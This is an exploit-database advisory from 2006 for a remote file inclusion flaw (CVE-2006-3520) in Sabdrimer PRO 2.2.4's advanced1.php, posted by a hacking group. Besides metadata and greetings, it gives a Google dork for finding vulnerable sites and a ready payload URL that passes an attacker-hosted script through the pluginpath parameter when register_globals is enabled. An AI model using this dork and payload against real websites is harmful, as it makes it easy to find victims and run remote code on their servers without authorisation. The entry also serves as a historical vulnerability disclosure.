Sabdrimer PRO 2.2.4 - 'pluginpath' Remote File Inclusion
Author: A.nosrati
type: webapps
platform: php
port:
date_added: 2006-07-08
date_updated:
verified: 1
codes: OSVDB-30932;CVE-2006-3520
tags:
aliases:
screenshot_url:
application_url:
VIRANGAR SECURITY TEAM
Discovered By : A.nosrati
www.virangar.org (Public)
www.virangar.net (Priv8)
Mail: info[at]virangar.net
Sabdrimer PRO (v.2.2.4 ) Remote File Include Vulnerability
Google Dork : "© Sabdrimer CMS"
bug found in file : advanced1.php
web Site : http://sabdrimer.ru
Remote : Yes
Critical Level : Dangerous
http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script]
Important :register_globals=On
-----------------------
Greetz : All #Virangar Members
I work in the dark
I Get what I want
# milw0rm.com [2006-07-09]